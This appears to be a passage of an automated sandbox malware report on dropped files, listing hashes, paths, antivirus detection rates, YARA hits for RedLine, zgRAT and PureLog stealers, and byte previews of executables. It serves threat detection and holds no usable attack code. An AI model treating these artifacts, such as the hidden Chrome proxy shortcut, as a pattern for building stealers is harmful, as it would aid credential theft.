                                                                                                                                                                                                                                        Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):13340
                                                                                                                                                                                                                                        Entropy (8bit):2.6841751964100413
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:TiZYWkZx0+UMYqDY6WCHwYEZo7/t8iXLWbIwdtPnDaf5bMIk1Io0A3:2ZDknJlmlnDaf5bMIkKBA3
                                                                                                                                                                                                                                        MD5:B06833D635EDAC2C98477EB92734E694
                                                                                                                                                                                                                                        SHA1:05F4FEA8B2E16825FFDD70CEE2D10F8A0C7213F0
                                                                                                                                                                                                                                        SHA-256:820FE965135890A63D94C785A1C301E385CB20ECD8F47DCAE9B2DBC3AB2FCDA8
                                                                                                                                                                                                                                        SHA-512:75177702E7BD81FFADB065CEBEE40DD71AA741AC33B7E824C46DD67C6F7D1A22F3FC256E8D18EE5141AB90E8723C01D958D0554C63C70090531E0C9F6CB0F3D4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\VP2pdCInvS.exe
                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:53 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2104
                                                                                                                                                                                                                                        Entropy (8bit):3.45122343775873
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:8S5l2dfTXdARYrnvPdAKRkdAGdAKRFdAKRE:8S5lO7
                                                                                                                                                                                                                                        MD5:8E5983C879C5FAC42FB0C7EEFA875A7B
                                                                                                                                                                                                                                        SHA1:5B1F3DA64EAA501D380340A63E84E24822CB3189
                                                                                                                                                                                                                                        SHA-256:D553BC18DF0A60384BE4AC4E22406F910D827B90014DBC1A7D8B175D94B9484C
                                                                                                                                                                                                                                        SHA-512:4F96A80B92F8F356B2B814DCFCC600F398FAB6FB16816A9FFFA1B3182519E43F57C99E4CAB79F4619961EDA7CC9ADF7C7BB65319378460130EB3DA8958B0A1D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:L..................F.@.. ......,.......l.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\VP2pdCInvS.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3274
                                                                                                                                                                                                                                        Entropy (8bit):5.3318368586986695
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                                                                                                                                                                                                                        MD5:0B2E58EF6402AD69025B36C36D16B67F
                                                                                                                                                                                                                                        SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                                                                                                                                                                                                                        SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                                                                                                                                                                                                                        SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1119
                                                                                                                                                                                                                                        Entropy (8bit):5.345080863654519
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                                                                                                                        MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                                                                                                                        SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                                                                                                                        SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                                                                                                                        SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1143296
                                                                                                                                                                                                                                        Entropy (8bit):7.890999314974424
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Qvw9Ct6MIdI8o+6RIX9PUT+2rS8hObOGB1HNJWm88D/sA6z11VT0qrBk:59Ct6MgZ2rS8qO21bWf8zSzzNBk
                                                                                                                                                                                                                                        MD5:5486FD5B8200F34B23F23A21F8912ADE
                                                                                                                                                                                                                                        SHA1:379F7B095751116C9A6C56D0945CA12AE122D253
                                                                                                                                                                                                                                        SHA-256:1ECF603A32B23FDF06E0260F314F5390E9C062D74FA2FE65B05754E83C41DF46
                                                                                                                                                                                                                                        SHA-512:E9AD33509EFC7303B09A9633F9F6136BBA807DECA3B9032A91475A66C038B4A1DF44E036D9F7ACAE63F1854DF65D47C00C59E6E3D79E7C44A5A6AE631C512F3F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.kwb.kwb.kwbj.tc.kwbj.rc.kwbj.sc.kwb{.sc.kwb{.tc.kwbj.vc.kwb.kvb9kwb{.rc.kwbJ.~c.kwbJ.wc.kwbJ.b.kwbJ.uc.kwbRich.kwb........................PE..L...rj.f...............'............Y.............@.......................................@.........................`A..H....A..<.......................................................................@...............`............................text....x.......z.................. ..`.BsS.................~.............. ..`.rdata..............................@..@.data...|+...P.......4..............@....rsrc................P..............@..@.reloc........... ...R..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1143296
                                                                                                                                                                                                                                        Entropy (8bit):7.890999314974424
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Qvw9Ct6MIdI8o+6RIX9PUT+2rS8hObOGB1HNJWm88D/sA6z11VT0qrBk:59Ct6MgZ2rS8qO21bWf8zSzzNBk
                                                                                                                                                                                                                                        MD5:5486FD5B8200F34B23F23A21F8912ADE
                                                                                                                                                                                                                                        SHA1:379F7B095751116C9A6C56D0945CA12AE122D253
                                                                                                                                                                                                                                        SHA-256:1ECF603A32B23FDF06E0260F314F5390E9C062D74FA2FE65B05754E83C41DF46
                                                                                                                                                                                                                                        SHA-512:E9AD33509EFC7303B09A9633F9F6136BBA807DECA3B9032A91475A66C038B4A1DF44E036D9F7ACAE63F1854DF65D47C00C59E6E3D79E7C44A5A6AE631C512F3F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1.kwb.kwb.kwbj.tc.kwbj.rc.kwbj.sc.kwb{.sc.kwb{.tc.kwbj.vc.kwb.kvb9kwb{.rc.kwbJ.~c.kwbJ.wc.kwbJ.b.kwbJ.uc.kwbRich.kwb........................PE..L...rj.f...............'............Y.............@.......................................@.........................`A..H....A..<.......................................................................@...............`............................text....x.......z.................. ..`.BsS.................~.............. ..`.rdata..............................@..@.data...|+...P.......4..............@....rsrc................P..............@..@.reloc........... ...R..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\mlk3kK6uLZ.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1880576
                                                                                                                                                                                                                                        Entropy (8bit):7.949860121922924
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:K23fbpRhR0OiwF7BESrgRSzLBEF7YcMs6:3zhR9FdVOFSz
                                                                                                                                                                                                                                        MD5:B85FA0D79D936B8B006C535D006C7F29
                                                                                                                                                                                                                                        SHA1:210085D4F3CF1CF08C34BAA5BFBA0B0FC5A6C639
                                                                                                                                                                                                                                        SHA-256:170004B7B6BAB6C3C860A6402F9D3D8988E4F3DE7682E28738C3C27AC33B0E1C
                                                                                                                                                                                                                                        SHA-512:263B04B455DD7AF8455ECA46FF9CF833D53A8A3D3C3A4BDF3CFC2EDFCF6993C19F2ECC6F2A61AD4C35B57264E3E08F545358C994EB8078AEB1D0403B218DA9A9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 72%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...*.^f..............................J...........@...........................J...........@.................................X...l...........................X.J...............................J..................................................... . ............................@....rsrc...............................@....idata ............................@... .@*.........................@...lkmvftub......0.....................@...ajmdtwbz......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\mlk3kK6uLZ.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\VP2pdCInvS.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2662
                                                                                                                                                                                                                                        Entropy (8bit):7.8230547059446645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                                                                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                                                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                                                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                                                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\VP2pdCInvS.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2662
                                                                                                                                                                                                                                        Entropy (8bit):7.8230547059446645
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                                                                                                                                                                                                                        MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                                                                                                                                                                                                                        SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                                                                                                                                                                                                                        SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                                                                                                                                                                                                                        SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\VP2pdCInvS.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2251
                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3::
                                                                                                                                                                                                                                        MD5:0158FE9CEAD91D1B027B795984737614
                                                                                                                                                                                                                                        SHA1:B41A11F909A7BDF1115088790A5680AC4E23031B
                                                                                                                                                                                                                                        SHA-256:513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
                                                                                                                                                                                                                                        SHA-512:C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):311296
                                                                                                                                                                                                                                        Entropy (8bit):5.082978582796552
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:qq6EgY6iQrUjytA4dwP8Zk1tx/Efz+TAGtASRkFcZqf7D341eqiOLibBOh:pqY6iAwP6k1vQz+TAiAtFcZqf7DIfL
                                                                                                                                                                                                                                        MD5:15A7CAE61788E4718D3C33ABB7BE6436
                                                                                                                                                                                                                                        SHA1:62DAC3A5D50C93C51F2AB4A5EBF78837DC7D3A9F
                                                                                                                                                                                                                                        SHA-256:BED71147AA297D95D2E2C67352FC06F7F631AF3B7871EA148638AE66FC41E200
                                                                                                                                                                                                                                        SHA-512:5B3E3028523E95452BE169BDFB966CD03EA5DBE34B7B98CF7482CA91B8317A0F4DE224751D5A530EC23E72CBD6CC8E414D2D3726FEFEE9C30FEAB69DC348FA45
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6B...............0................. ... ....@.. ....................... ............@.....................................O.... ..............................x................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):390144
                                                                                                                                                                                                                                        Entropy (8bit):6.247444114287809
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:yRS/YGuDHJKi6sv5Ik97X6mYRA757d93PkVVcTdBMIVPv7pEVzTqHsDjHicCT:quYG0pKidpsmT757TPtTbj7EzOHs6
                                                                                                                                                                                                                                        MD5:1B75671FB234AE1FB72406A317FA752A
                                                                                                                                                                                                                                        SHA1:BD47C38B7FB55D013B85C60CD51C8C5EE56F3757
                                                                                                                                                                                                                                        SHA-256:499D5830B76DAFF19E04393BA05F63BAA893F8D86AE358FC59365A5938177CBE
                                                                                                                                                                                                                                        SHA-512:4C96D2C40862F73314394F48BC9C0930D5C51BFAA389185518C84AC921CEAFAB0F296DF48655A9640D4232265DAF67F3B0F4B886BFD31D230E8EC9ED11BBC2F5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, Author: ditekSHen
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 64%
                                                                                                                                                                                                                                        • Antivirus: Virustotal, Detection: 45%, Browse
                                                                                                                                                                                                                                        Reputation:unknown
